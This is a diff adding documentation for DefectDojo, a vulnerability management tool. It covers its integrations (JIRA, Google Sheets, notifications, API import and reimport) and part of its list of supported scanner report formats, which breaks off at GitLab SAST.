[SecureCodeBox](https://github.com/secureCodeBox/secureCodeBox) | +| [Image using the Java library](https://github.com/SDA-SE/defectdojo-client) | working (2021-08-30) | | +| [.Net/C# library](https://www.nuget.org/packages/DefectDojo.Api/) | working (2021-06-08) | | +| [dd-import](https://github.com/MaibornWolff/dd-import) | working (2021-08-24) | dd-import is not directly an API wrapper. It offers some convenience functions to make it easier to import findings and language data from CI/CD pipelines. | + +Some of the api wrappers contain quite a bit of logic to ease scanning and importing in CI/CD environments. We are in the process of simplifying this by making the DefectDojo API smarter (so api wrappers / script can be dumber). \ No newline at end of file diff --git a/docs/content/en/integrations/burp-plugin.md b/docs/content/en/integrations/burp-plugin.md new file mode 100644 index 00000000000..bcec96953e6 --- /dev/null +++ b/docs/content/en/integrations/burp-plugin.md @@ -0,0 +1,26 @@ +--- +title: "Defect Dojo Burp plugin" +description: "Export findings directly from Burp to DefectDojo." +draft: false +weight: 8 +--- + + +This is Burp Plugin to export findings directly to DefectDojo. + +Installation +------------ + +In order for the plugin to work , you will need to have Jython set up in +Burp Suite Pro . To use this plugin before it appears in the BApp Store +you will need to do the following : + +1. Go to `Extender` and select the `Extensions` + tab +2. Click on `Add` , select `Extension Type:` to + be `Python` and select the `DefectDojoPlugin.py` + +Usage +----- + +![image](../../images/burp_plugin_usage.gif) diff --git a/docs/content/en/integrations/exporting.md b/docs/content/en/integrations/exporting.md new file mode 100644 index 00000000000..da17df7d93b --- /dev/null +++ b/docs/content/en/integrations/exporting.md @@ -0,0 +1,17 @@ +--- +title: "Exporting" +description: "DefectDojo has the ability to export findings." +draft: false +weight: 11 +--- + + +## Export Findings + +Pages that show a list of findings or a list of engagements have a CSV and Excel Export functionality in the top right dropdown menu. + +![Export findings](../../images/export_1.png) + +The list of engagements can be exported as CSV/Excel. + +![Export engagements](../../images/export_2.png) \ No newline at end of file diff --git a/docs/content/en/integrations/google-sheets-sync.md b/docs/content/en/integrations/google-sheets-sync.md new file mode 100644 index 00000000000..d2d94746df7 --- /dev/null +++ b/docs/content/en/integrations/google-sheets-sync.md @@ -0,0 +1,115 @@ +--- +title: "Google Sheets synchronisation" +description: "Export finding details to Google Sheets and upload changes from Google Sheets." +draft: false +weight: 7 +--- + + +With the Google Sheets sync feature, DefectDojo allow the users to +export all the finding details of each test into a separate Google +Spreadsheet. Users can review and edit finding details via Google +Spreadsheets. Also, they can add new notes to findings and edit existing +notes using the Google Spreadsheet. After reviewing and updating the +finding details in the Google Spreadsheet, the user can import (sync) +all the changes done via the Google Spreadsheet into DefectDojo +database. + +### Configuration + +Creating a project and a Service Account + +1. Go to the [Service Accounts + page](https://console.developers.google.com/iam-admin/serviceaccounts/). +2. Create a new project for DefectDojo and select it. +3. Click **+CREATE SERVICE ACCOUNT**, enter a name and description + for the service account. You can use the default service account + ID, or choose a different, unique one. When done click Create. +4. The **Service account permissions (optional)** section that + follows is not required. Click **Continue**. +5. On the **Grant users access to this service account** screen, + scroll down to the **Create key** section. Click **+Create + key**. +6. In the side panel that appears, select the format for your key + as **JSON** +7. Click **Create**. Your new public/private key pair is generated + and downloaded to your machine. + +Enabling the required APIs + +1. Go to the [Google API + Console](https://console.developers.google.com//). +2. From the projects list, select the project created for + DefectDojo. +3. If the APIs & services page isn\'t already open, open the + console left side menu and select **APIs & services**, and then + select **Library**. +4. **Google Sheets API** and **Google Drive API** should be + enabled. Click the API you want to enable. If you need help + finding the API, use the search field. +5. Click **ENABLE**. + +Configurations in DefectDojo + +1. Click \'Configuration\' from the left hand menu. +2. Click \'Google Sheets Sync\'. +3. Fill the form. + + ![Google Sheets Sync Configuration Page](../../images/google_sheets_sync_1.png) + + * Upload the downloaded json file into the **Upload + Credentials file** field. + + * Drive Folder Id: + + * Create a folder inside the Google drive of the same + Gmail account used to create the service account. + * Get the **client\_email** from the downloaded json file + and share the created drive folder with client\_email + giving **edit access**. + * Extract the folder id from the URL and insert it as the + **Drive Folder Id**: + + ![Extracting Drive Folder ID](../../images/google_sheets_sync_2.png) + + * Tick the **Enable Service** check box. (**Optional** as this + has no impact on the configuration, but you must set it to + true inorder to use the feature. Service can be enabled or + disabled at any point after the configuration using this + check box) + + * For each field in the finding table there are two related + entries in the form: + + * In the drop down, select Hide if the column needs to be + hidden in the Google Sheet, else select any other option + based on the length of the entry that goes under the + column. + * If the column needs to be protected in the Google Sheet, + tick the check box. Otherwise leave it unchecked. + +4. Click \'Submit\'. + +Admin has the privilege to revoke the access given to DefectDojo to +access Google Sheets and Google Drive data by simply clicking the +**Revoke Access** button. + +### Using Google Sheets Sync Feature + +Before a user can export a test to a Google Spreadsheet, admin must +Configure Google Sheets Sync and **Enable** sync feature.Depending on +whether a Google Spreadsheet exists for the test or not, the User +interface displayed will be different. + +If a Google Spreadsheet does not exist for the Test: + +![Create Google Sheet Button](../../images/google_sheets_sync_3.png) + +If a Google Spreadsheet is already created for the Test: + +![Sync Google Sheet Button](../../images/google_sheets_sync_4.png) + +After creating a Google Spreadsheet, users can review and edit Finding +details using the Google Sheet. If any change is done in the Google +Sheet users can click the **Sync Google Sheet** button to get those +changes into DefectDojo. \ No newline at end of file diff --git a/docs/content/en/integrations/importing.md b/docs/content/en/integrations/importing.md new file mode 100644 index 00000000000..869b55c5c93 --- /dev/null +++ b/docs/content/en/integrations/importing.md @@ -0,0 +1,136 @@ +--- +title: "Importing" +description: "How DefectDojo imports and reimports security tool reports." +draft: false +weight: 1 +--- + +## Import + +The importers analyze each report and create new Findings for each item +reported. DefectDojo collapses duplicate Findings by capturing the +individual hosts vulnerable. + +![Import Form](../../images/imp_1.png) + +This approach will create a new Test for each upload. This can result a lot of findings. If deduplication is enabled, new findings that are identical to existing findings get marked as a duplicate. + +## Reimport + +Additionally, DefectDojo allows for re-imports of previously uploaded +reports. This greatly reduces the amount of findings as no duplicates are created for findings that already exist. + +![Reimport menu](../../images/reupload_menu1.png) + +DefectDojo will attempt to capture the deltas between the +original and new import and automatically add or mitigate findings as +appropriate. + +![Re-Import Form](../../images/imp_2.png) + +This behaviour can be controled via the `closed_old_findings` parameter on the reupload form. + +The history of a test will be shown with the delta's for each reimported scan report. +![Import History](../../images/import_history1.png) + +Clicking on a reimport changset will show the affected findings, as well as a status history per finding. +![Import History details](../../images/import_history_details1.png) + +# API +This section focuses on Import and Reimport via the API. Please see the [full documentation defails of all API Endpoints](../api-v2-docs/) for more details. +Reimport is actually the easiest way to get started as it will create any entities on the fly if needed and it will automatically detect if it is a first time upload or a re-upload. + +## Import +Importing via the API is performed via the [import-scan](https://demo.defectdojo.org/api/v2/doc/) endpoint. + +As described in the [Core Data Classes](../../usage/models/), a test gets created inside an Engagement, inside a Product, inside a Product Type. + +An import can be performed by specifying the names of these entities in the API request: + + +```JSON +{ + "minimum_severity": 'Info', + "active": True, + "verified": Trued, + "scan_type": 'ZAP Scan', + "test_title": 'Manual ZAP Scan by John', + "product_type_name": 'Good Products', + "product_name": 'My little product', + "engagement_name": 'Important import', + "auto_create_context": True, +} +``` + +When `auto_create_context` is `True`, the product and engagement will be created if needed. Make sure your user has sufficient [permissions](../usage/permissions) to do this. + +A classic way of importing a scan is by specifying the ID of the engagement instead: + +```JSON +{ + "minimum_severity": 'Info', + "active": True, + "verified": Trued, + "scan_type": 'ZAP Scan', + "test_title": 'Manual ZAP Scan by John', + "engagement": 123, +} +``` + + +## Reimport +ReImporting via the API is performed via the [reimport-scan](https://demo.defectdojo.org/api/v2/doc/) endpoint. + +An reimport can be performed by specifying the names of these entities in the API request: + + +```JSON +{ + "minimum_severity": 'Info', + "active": True, + "verified": Trued, + "scan_type": 'ZAP Scan', + "test_title": 'Manual ZAP Scan by John', + "product_type_name": 'Good Products', + "product_name": 'My little product', + "engagement_name": 'Important import', + "auto_create_context": True, +} +``` + +When `auto_create_context` is `True`, the product and engagement will be created if needed. Make sure your user has sufficient [permissions](../usage/permissions) to do this. + +A Reimport will automatically select the latest test inside the provided engagement that satisifes the provided `scan_type` and (optionally) provided `test_title` + +If no existing Test is found, the reimport endpoint will use the import function to import the provided report into a new Test. This means a (CI/CD) script using the API doesn't need to know if a Test already exist, or if it is a first time upload for this product / engagement. + +A classic way of reimporting a scan is by specifying the ID of the test instead: + +```JSON +{ + "minimum_severity": 'Info', + "active": True, + "verified": Trued, + "scan_type": 'ZAP Scan', + "test": 123, +} +``` + +## Using the Scan Completion Date (API: `scan_date`) field + +DefectDojo offers a plethora of supported scanner reports, but not all of them contain the +information most important to a user. The `scan_date` field is a flexible smart feature that +allows users to set the completion date of the a given scan report, and have it propagate +down to all the findings imported. This field is **not** mandatory, but the default value for +this field is the date of import (whenever the request is processed and a successful response is returned). + +Here are the following use cases for using this field: + +1. The report **does not** set the date, and `scan_date` is **not** set at import + - Finding date will be the default value of `scan_date` +2. The report **sets** the date, and the `scan_date` is **not** set at import + - Finding date will be whatever the report sets +3. The report **does not** set the date, and the `scan_date` is **set** at import + - Finding date will be whatever the user set for `scan_date` +4. The report **sets** the date, and the `scan_date` is **set** at import + - Finding date will be whatever the user set for `scan_date` diff --git a/docs/content/en/integrations/jira.md b/docs/content/en/integrations/jira.md new file mode 100644 index 00000000000..f0163c869ce --- /dev/null +++ b/docs/content/en/integrations/jira.md @@ -0,0 +1,190 @@ +--- +title: "JIRA integration" +description: "Bidirectional integration of DefectDojo findings with Jira issues." +draft: false +weight: 4 +--- + +DefectDojo\'s JIRA integration is bidirectional. You may push findings +to JIRA and share comments. If an issue is closed in JIRA it will +automatically be closed in Dojo. + +**NOTE:** These steps will configure the necessary webhook in JIRA and add JIRA integration into DefectDojo. This isn\'t sufficient by itself, you will need to configure products and findings to push to JIRA. On a product\'s settings page you will need to define a: + +- Project Key (and this project must exist in JIRA) +- JIRA Configuration (select the JIRA configuration that you + create in the steps below) +- Component (can be left blank) + +Then elect (via tickbox) whether you want to \'Push all issues\', +\'Enable engagement epic mapping\' and/or \'Push notes\'. Then click on +\'Submit\'. + +If creating a Finding, ensure to tick \'Push to jira\' if desired. + +Enabling the Webhook +-------------------- + +1. Visit \<**YOUR JIRA URL**\>/plugins/servlet/webhooks +2. Click \'Create a Webhook\' +3. For the field labeled \'URL\' enter: \<**YOUR DOJO + DOMAIN**\>/jira/webhook/<**YOUR GENERATED WEBHOOK SECRET**> + This value can be found under Defect Dojo System settings +4. Under \'Comments\' enable \'Created\'. Under Issue enable + \'Updated\'. + +Configurations in Dojo +---------------------- + +1. Navigate to the System Settings from the menu on the left side + or by directly visiting \/system\_settings. +2. Enable \'Enable JIRA integration\' and click submit. +3. For the webhook created in Enabling the Webhook, enable + \'Enable JIRA web hook\' and click submit. + +Adding JIRA to Dojo +------------------- + +1. Click \'JIRA\' from the left hand menu. +2. Select \'Add Configuration\' from the drop-down. +3. For JIRA Server: + + Enter the _Username_ & _Password_. A _Username_ and JIRA _Personal Access Token_ will not necessarily work. + + For JIRA Cloud: + + Enter _Email Address_ & [API token for Jira](https://support.atlassian.com/atlassian-account/docs/manage-api-tokens-for-your-atlassian-account/) +4. To obtain the \'open status key\' and \'closed status key\' + visit \<**YOUR JIRA + URL**\>/rest/api/latest/issue/\<**ANY VALID ISSUE + KEY**\>/transitions?expand=transitions.fields +5. The \'id\' for \'Todo\' should be filled in as the \'open status + key\' +6. The \'id\' for \'Done\' should be filled in as the \'closed + status key\' + +To obtain \'epic name id\': If you have admin access to JIRA: + +1. visit: \<**YOUR JIRA + URL**\>/secure/admin/ViewCustomFields.jspa +2. Click on the cog next to \'Epic Name\' and select view. +3. The numeric value for \'epic name id\' will be displayed in the + URL +4. **Note**: dojojira uses the same celery functionality as + reports. Make sure the celery runner is setup correctly as + described: + + +Or + +1. login to JIRA +2. visit and use control+F + or grep to search for \'Epic Name\' it should look something + like this: + +{ + "id":"customfield_122", + "key":"customfield_122", + "name":"Epic Name", + "custom":true, + "orderable":true, + "navigable":true, + "searchable":true, + "clauseNames":"cf[122]", + "Epic Name"\], + "schema":{"type":"string","custom":"com.pyxis.greenhopper.jira:gh-epic-label","customId":122} +} + +**In the above example 122 is the number needed** + +## Customize JIRA issue description + +By default Defect Dojo uses the `dojo/templates/issue-trackers/jira_full/jira-description.tpl` template to render the description of the 'to be' created JIRA issue. +This file can be modified to your needs, rebuild all containers afterwards. There's also a more limited template available, which can be chosen when +configuring a JIRA Instance or JIRA Project for a Product or Engagement: + +![image](../../images/jira_issue_templates.png) + +Any folder added to `dojo/templates/issue-trackers/` will be added to the dropdown (after rebuilding/restarting the containers). + +## Engagement Epic Mapping + +If creating an Engagement, ensure to tick 'Enable engagement epic mapping' if desired. This can also be done after engagement creation on the edit engagement page. +This will create an 'Epic' type issue within Jira. All findings in the engagement pushed to Jira will have a link to this Epic issue. +If Epic Mapping was enabled after associated findings have already been pushed to Jira, simply pushing them again will link the Jira issue to the Epic issue. + +## Pushing findings + +Findings can be pushed to Jira in a number of ways: + +1. When importing scanner reports, select 'Push to JIRA' to push every single finding in the report to Jira +2. When creating a new finding, select 'Push to JIRA' and submit. This will create the finding in DefectDojo and Jira simultaneously +3. If a finding already exist, visit the edit finding page and find the 'Push to JIRA' tick box at the bottom +4. When viewing a list of findings, select each relevant tick boxes to the left of the finding, and click the 'Bulk Edit' button at the top. find 'Push to JIRA' at the bottom of the menu + +## Status Sync + +DefectDojo will try to keep the status in sync with the status in JIRA +using the Close and Reopen transition IDs configured for each JIRA instance. This +will only work if your workflow in JIRA allows the Close transition to be +performed from every status a JIRA issue can be in. + +## Known Issues + +The Risk Acceptance feature +in DefectDojo will (for that reason) not (yet) try to sync statuses. A +comment will be pushed to JIRA if a finding is risk accepted or +unaccepted. Contributions are welcome to enhance the integration. + +## Status reconciliation + +Sometimes JIRA is down, or Defect Dojo is down, or there was bug in a webhook. In this case +JIRA can become out of sync with Defect Dojo. If this is the case for lots of issues, manual reconciliation +might not be feasible. For this scenario there is the management command 'jira_status_reconciliation'. + +{{< highlight bash >}} +usage: manage.py jira_status_reconciliation [-h] [--mode MODE] [--product PRODUCT] [--engagement ENGAGEMENT] [--dryrun] [--version] [-v {0,1,2,3}] + +Reconcile finding status with JIRA issue status, stdout will contain semicolon seperated CSV results. +Risk Accepted findings are skipped. Findings created before 1.14.0 are skipped. + +optional arguments: + -h, --help show this help message and exit + --mode MODE - reconcile: (default)reconcile any differences in status between Defect Dojo and JIRA, will look at the latest status change + timestamp in both systems to determine which one is the correct status + - push_status_to_jira: update JIRA status for all JIRA issues + connected to a Defect Dojo finding (will not push summary/description, only status) + - import_status_from_jira: update Defect Dojo + finding status from JIRA + --product PRODUCT Only process findings in this product (name) + --engagement ENGAGEMENT + Only process findings in this product (name) + --dryrun Only print actions to be performed, but make no modifications. + -v {0,1,2,3}, --verbosity {0,1,2,3} + Verbosity level; 0=minimal output, 1=normal output, 2=verbose output, 3=very verbose output +{{< /highlight >}} + +This can be executed from the uwsgi docker container using: + +{{< highlight bash >}} +$ docker-compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation' +{{< /highlight >}} + +DEBUG output can be obtains via `-v 3`, but only after increasing the logging to DEBUG level in your settings.dist.py or local_settings.py file + +{{< highlight bash >}} +$ docker-compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation -v 3' +{{< /highlight >}} + +At the end of the command a semicolon seperated CSV summary will be printed. This can be captured by redirecting stdout to a file: + +{{< highlight bash >}} +$ docker-compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation > jira_reconciliation.csv' +{{< /highlight >}} + + +## Troubleshooting JIRA integration + +JIRA actions are typically performed in the celery background process. +Errors are logged as alerts/notifications to be seen on the top right of +the DefectDojo UI and in stdout of the celery workers. diff --git a/docs/content/en/integrations/languages.md b/docs/content/en/integrations/languages.md new file mode 100644 index 00000000000..17a322c8f90 --- /dev/null +++ b/docs/content/en/integrations/languages.md @@ -0,0 +1,31 @@ +--- +title: "Languages and lines of code" +description: "You can import an analysis of languages used in a project, including lines of code." +draft: false +weight: 9 +--- + +## Import of languages for a project + +You can import JSON reports generated by the [cloc tool](https://github.com/AlDanial/cloc) via the API: + +![Import of cloc JSON file](../../images/languages_api.png) + +When importing a file, all language information for the respective project will be deleted first and then populated with the content of the file. +Please make sure to use the `--json` parameter when invoking the `cloc` command, to get the correct file format. + +## Display + +The results of the import are shown on the left side of the product details page. + +![Display of languages](../../images/languages_ui.png) + +The colors are defined by entries in the table `Language_Type`, which has been prepopulated with data from GitHub. + +## Import of language types + +GitHub updates its language colors from time to time, when new languages emerge. The management command + +`./manage.py import_github_languages` + +reads data from a JSON file hosted in https://github.com/ozh/github-colors to add new languages and update colors. diff --git a/docs/content/en/integrations/notifications.md b/docs/content/en/integrations/notifications.md new file mode 100644 index 00000000000..9b39e3f3da4 --- /dev/null +++ b/docs/content/en/integrations/notifications.md @@ -0,0 +1,62 @@ +--- +title: "Notifications" +description: "DefectDojo can inform you about changes on different channels." +draft: false +weight: 6 +--- + +## Notifications + +![Notification settings](../../images/notifications_1.png) + +DefectDojo can inform you of different events in a variety of ways. You +can be notified about things like an upcoming engagement, when someone +mentions you in a comment, a scheduled report has finished generating, +and more. + +The following notification methods currently exist: + - Email + - Slack + - Microsoft Teams + - Alerts within DefectDojo (default) + +You can set these notifications on a global scope (if you have +administrator rights) or on a personal scope. For instance, an +administrator might want notifications of all upcoming engagements sent +to a certain Slack channel, whereas an individual user wants email +notifications to be sent to the user\'s specified email address when a +report has finished generating. + +Users can define notifications on a product level as well, and these settings will be applied only for selected products. + +Microsoft Teams does not provide an easy way to send messages to a personal +channel. Therefore, DefectDojo can only send system scope notifications +to Microsoft Teams. + +In order to identify and notify you about things like upcoming +engagements, DefectDojo runs scheduled tasks for this purpose. These +tasks are scheduled and run using Celery beat, so this needs to run for +those notifications to work. + +DefectDojo allows `template` to be used, administrator can use this feature to define which notification should be received by newly created users. + +### Slack + +#### Scopes + +The following scopes have to be granted. + +![Slack OAuth scopes](../../images/slack_scopes.png) + +#### Token + +The bot token has to be chosen and put in your System Settings + +![Slack token](../../images/slack_tokens.png) + +### Microsoft Teams + +To activate notifications to Microsoft Teams, you have to: +- Configure an Incoming Webhook in a Teams channel and copy the URL of the webhook to the clipboard +- Activate `Enable Microsoft Teams notifications` in the System Settings +- Paste the URL of the Incoming Webhook into the field `Msteams url` diff --git a/docs/content/en/integrations/parsers.md b/docs/content/en/integrations/parsers.md new file mode 100644 index 00000000000..fa63edcc657 --- /dev/null +++ b/docs/content/en/integrations/parsers.md @@ -0,0 +1,1202 @@ +--- +title: "Supported reports" +description: "DefectDojo has the ability to import scan reports from a large number of security tools." +draft: false +weight: 1 +--- + +## Security Tools + +### Acunetix Scanner + +XML format + +### Acunetix 360 Scanner + +Vulnerabilities List - JSON report + +### Anchore-Engine + +JSON vulnerability report generated by anchore-cli tool, using a command +like `anchore-cli --json image vuln all` + +### Aqua + +JSON report format. + +### Anchore Grype + +Anchore Grype JSON report format generated with `-o json` option. + +{{< highlight bash >}} +grype defectdojo/defectdojo-django:1.13.1 -o json > many_vulns.json +{{< /highlight >}} + +### Arachni Scanner + +Arachni Web Scanner (http://arachni-scanner.com/wiki) + +Reports are generated with `arachni_reporter` tool this way: + +{{< highlight bash >}} +arachni_reporter --reporter 'json' js.com.afr +{{< /highlight >}} + +### AppSpider (Rapid7) + +Use the VulnerabilitiesSummary.xml file found in the zipped report +download. + +### AuditJS (OSSIndex) + +AuditJS scanning tool using OSSIndex database and generated with `--json` or `-j` option (). + +{{< highlight bash >}} +auditjs ossi --json > auditjs_report.json +{{< /highlight >}} + +### AWS Security Hub + +The JSON output from AWS Security Hub exported with the `aws securityhub get-findings` () +command. + +### AWS Scout2 Scanner (deprecated) + +JS file in scout2-report/inc-awsconfig/aws\_config.js. + +{{% alert title="Warning" color="warning" %}} +AWS Scout2 Scanner is deprecated and has been replaced with ScoutSuite (https://github.com/nccgroup/ScoutSuite) upstream. +Please switch to the new parser for ScoutSuite. +{{% /alert %}} + +{{% alert title="Warning" color="warning" %}} +This parser is disactivated by default in releases >= 2.3.1 and will be removed in release >= 3.x.x. +{{% /alert %}} + +### AWS Prowler Scanner + +Prowler file can be imported as a CSV (`-M csv`) or JSON (`-M json`) file. + +### Azure Security Center Recommendations Scan + +Azure Security Center recommendations can be exported from the user interface in CSV format. + +### Bandit + +JSON report format + +### Blackduck Hub + +2 options: + +* Import the zip file as can be created by Blackduck export. +The zip file must contain the security.csv and files.csv in order to +produce findings that bear file locations information. +* Import a single security.csv file. Findings will not have any file location +information. + +### Brakeman Scan + +Import Brakeman Scanner findings in JSON format. + +### Bugcrowd + +Import Bugcrowd results in CSV format. + +### Bundler-Audit + +Import the text output generated with bundle-audit check + +### Burp XML + +When the Burp report is generated, **the recommended option is Base64 +encoding both the request and response fields** - e.g. check the box +that says \"Base64-encode requests and responses\". These fields will be +processed and made available in the \'Finding View\' page. + +### Burp Enterprise Scan + +Import HTML reports from Burp Enterprise Edition + +### Burp GraphQL + +Import the JSON data returned from the BurpSuite Enterprise GraphQL API. Append all the +issues returned to a list and save it as the value for the key "Issues". There is no need +to filter duplicates, the parser will automatically combine issues with the same name. + +Example: + +{{< highlight json >}} +{ + "Issues": [ + { + "issue_type": { + "name": "Cross-site scripting (reflected)", + "description_html": "Issue Description", + "remediation_html": "Issue Remediation", + "vulnerability_classifications_html": "
  • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
  • ", + "references_html": "
  • Cross-site scripting
  • " + }, + "description_html": "Details", + "remediation_html": "Remediation Details", + "severity": "high", + "path": "/burp", + "origin": "https://portswigger.net", + "evidence": [ + { + "request_index": 0, + "request_segments": [ + { + "data_html": "GET" + }, + { + "highlight_html": "data" + }, + { + "data_html": " HTTP More data" + } + ] + }, + { + "response_index": 0, + "response_segments": [ + { + "data_html": "HTTP/2 200 OK " + }, + { + "highlight_html": "data" + }, + { + "data_html": "More data" + } + ] + } + ] + } + ] +} +{{< /highlight >}} + +Example GraphQL query to get issue details: + +{{< highlight graphql >}} + query Issue ($id: ID!, $serial_num: ID!) { + issue(scan_id: $id, serial_number: $serial_num) { + issue_type { + name + description_html + remediation_html + vulnerability_classifications_html + references_html + } + description_html + remediation_html + severity + path + origin + evidence { + ... on Request { + request_index + request_segments { + ... on DataSegment { + data_html + } + ... on HighlightSegment { + highlight_html + } + } + } + ... on Response { + response_index + response_segments { + ... on DataSegment { + data_html + } + ... on HighlightSegment { + highlight_html + } + } + } + } + } + } +{{< /highlight >}} + + +### CargoAudit Scan + +Import JSON output of cargo-audit scan report + +### Checkov Report + +Import JSON reports of Infrastructure as Code vulnerabilities. + +### Clair Scan + +Import JSON reports of Docker image vulnerabilities. + +### Clair Klar Scan + +Import JSON reports of Docker image vulnerabilities from clair klar +client. + +### Cobalt.io Scan + +CSV Report + +### Cobalt.io API Import + +Import findings from the Cobalt.io API - no file required. + +Follow these steps to setup API importing: + +1. Configure the Cobalt.io Authentication details by navigating to + Configuration / Tool Configuration, selecting the Tool Type to "Cobalt.io", + and Authentication Type "API Key". Paste your Cobalt.io API key in the + "API Key" field and the desired org token in the "Extras" field. +2. In the Product settings select "Add API Scan Configuration" and select the + previously added Cobalt.io Tool Configuration. Provide the ID + of the asset from which to import findings in the field *Service key 1*. + The ID can be found at the end of the URL when viewing the asset in your browser. +3. After this is done, you can import the findings by selecting "Cobalt.io + API Import" as the scan type. If you have more than one asset configured, you + must also select which Cobalt.io API Scan Configuratio to use. + +### CodeQL + +CodeQL can be used to generate a SARIF report, that can be imported into Defect Dojo: + +```shell +codeql database analyze db python-security-and-quality.qls --sarif-add-snippets --format=sarif-latest --output=security-extended.sarif +``` + +The same can be achieved by running the CodeQL GitHub action with the `add-snippet` property set to true. + +### Coverity API + +Export Coverity API view data in JSON format (`/api/viewContents/issues` endpoint). + +Currently these columns are mandatory: + * `displayType` (`Type` in the UI) + * `displayImpact` (`Impact` in the UI) + * `status` (`Status` in the UI) + * `firstDetected` (`First Detected` in the UI) + +Other supported attributes: `cwe`, `displayFile`, `occurrenceCount` and `firstDetected` + +### Crashtest Security + +Import JSON Report Import XML Report in JUnit Format + +### CredScan Report + +Import CSV credential scanner reports + +### Contrast Scanner + +CSV Report + +### Checkmarx + +- `Checkmarx Scan`, `Checkmarx Scan detailed`: XML report from Checkmarx SAST (source code analysis) +- `Checkmarx OSA`: json report from Checkmarx Open Source Analysis (dependencies analysis) + +To generate the OSA report using Checkmarx CLI: +`./runCxConsole.sh OsaScan -v -CxServer <...> -CxToken <..> -projectName <...> -enableOsa -OsaLocationPath -OsaJson ` + +That will generate three files, two of which are needed for defectdojo. Build the file for defectdojo with the jq utility: +`jq -s . CxOSAVulnerabilities.json CxOSALibraries.json` + +### Cloudsploit (AquaSecurity) + +From: https://github.com/aquasecurity/cloudsploit . Import the JSON output. + +### CycloneDX + +CycloneDX is a lightweight software bill of materials (SBOM) standard designed for use in application security contexts and supply chain component analysis. + +From: https://www.cyclonedx.org/ + +Example with Anchore Grype: + +{{< highlight bash >}} +./grype defectdojo/defectdojo-django:1.13.1 -o cyclonedx > report.xml +{{< /highlight >}} + +Example with `cyclonedx-bom` tool: + +{{< highlight bash >}} +pip install cyclonedx-bom +cyclonedx-py +{{< /highlight >}} + +{{< highlight bash >}} + Usage: cyclonedx-py [OPTIONS] + Options: + -i - the alternate filename to a frozen requirements.txt + -o - the bom file to create + -j - generate JSON instead of XML +{{< /highlight >}} + +### DawnScanner + +Import report in JSON generated with -j option + +### Dependency Check + +OWASP Dependency Check output can be imported in Xml format. This parser ingests the vulnerable dependencies and inherits the suppressions. + +* Suppressed vulnerabilities are tagged with the tag: `suppressed`. +* Suppressed vulnerabilities are marked as inactive, but not as mitigated. +* If the suppression is missing any `` tag, it tags them as `no_suppression_document`. +* Related vulnerable dependencies are tagged with `related` tag. + +### Dependency Track + +Dependency Track has implemented a DefectDojo integration. Information about +how to configure the integration is documented here: +https://docs.dependencytrack.org/integrations/defectdojo/ + +Alternatively, the Finding Packaging Format (FPF) from OWASP Dependency Track can be +imported in JSON format. See here for more info on this JSON format: + + +### DrHeader + +Import of JSON report from + + +### Dockle Report + +Import JSON container image linter reports + + +### Detect-secrets + +Import of JSON report from + +### Edgescan + +Import Edgescan vulnerabilities by JSON file or API - no file required. + +Follow these steps to setup API importing: + +1. Configure the Edgescan Authentication details by navigating to + Configuration / Tool Configuration, selecting the Tool Type to "Edgescan", + and Authentication Type "API Key". Paste your Edgescan API key in the + "API Key" field. +2. In the Product settings select "Add API Scan Configuration" and select the + previously added Edgescan Tool Configuration. Provide the ID + of the asset from which to import findings in the field *Service key 1*. +3. After this is done, you can import the findings by selecting + "Edgescan Scan" as the scan type. If you have more than one asset + configured, you must also select which Edgescan API Scan Configuration to + use. + +### ESLint + +ESLint Json report format (-f json) + +### Fortify + +Import Findings from XML file format. + +### Generic Findings Import + +Import Generic findings in CSV or JSON format. + +Attributes supported for CSV: +- Date: Date of the finding in mm/dd/yyyy format. +- Title: Title of the finding +- CweId: Cwe identifier, must be an integer value. +- Url: Url associated with the finding. +- Severity: Severity of the finding. Must be one of Info, Low, Medium, High, or Critical. +- Description: Description of the finding. Can be multiple lines if enclosed in double quotes. +- Mitigation: Possible Mitigations for the finding. Can be multiple lines if enclosed in double quotes. +- Impact: Detailed impact of the finding. Can be multiple lines if enclosed in double quotes. +- References: References associated with the finding. Can be multiple lines if enclosed in double quotes. +- Active: Indicator if the finding is active. Must be empty, TRUE or FALSE +- Verified: Indicator if the finding has been verified. Must be empty, TRUE, or FALSE +- FalsePositive: Indicator if the finding is a false positive. Must be TRUE, or FALSE. +- Duplicate:Indicator if the finding is a duplicate. Must be TRUE, or FALSE + +The CSV expects a header row with the names of the attributes. + +Example of JSON format: + +```JSON +{ + "findings": [ + { + "title": "test title with endpoints as dict", + "description": "Some very long description with\n\n some UTF-8 chars à qu'il est beau", + "severity": "Medium", + "mitigation": "Some mitigation", + "date": "2021-01-06", + "cve": "CVE-2020-36234", + "cwe": 261, + "cvssv3": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", + "file_path": "src/first.cpp", + "line": 13, + "endpoints": [ + { + "host": "exemple.com" + } + ] + }, + { + "title": "test title with endpoints as strings", + "description": "Some very long description with\n\n some UTF-8 chars à qu'il est beau2", + "severity": "Critical", + "mitigation": "Some mitigation", + "date": "2021-01-06", + "cve": "CVE-2020-36235", + "cwe": 287, + "cvssv3": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", + "file_path": "src/two.cpp", + "line": 135, + "endpoints": [ + "http://urlfiltering.paloaltonetworks.com/test-command-and-control", + "https://urlfiltering.paloaltonetworks.com:2345/test-pest" + ] + }, + { + "title": "test title", + "description": "Some very long description with\n\n some UTF-8 chars à qu'il est beau2", + "severity": "Critical", + "mitigation": "Some mitigation", + "date": "2021-01-06", + "cve": "CVE-2020-36236", + "cwe": 287, + "cvssv3": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", + "file_path": "src/threeeeeeeeee.cpp", + "line": 1353 + } + ] +} +``` + +This parser support an attributes that accept files as Base64 strings. These files are attached to the respective findings. + +Example: + +```JSON +{ + "title": "My wonderful report", + "findings": [ + { + "title": "Vuln with image", + "description": "Some very long description", + "severity": "Medium", + "files": [ + { + "title": "Screenshot from 2017-04-10 16-54-19.png", + "data": "iVBORw0KGgoAAAANSUhEUgAABWgAAAK0CAIAAAARSkPJAAAAA3N<...>TkSuQmCC" + } + ] + } + ] +} +``` + +### Gosec Scanner + +Import Gosec Scanner findings in JSON format. + +### Gitleaks + +Import Gitleaks findings in JSON format. + +### GitLab SAST Report + +Import SAST Report vulnerabilities in JSON format: https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format + +### 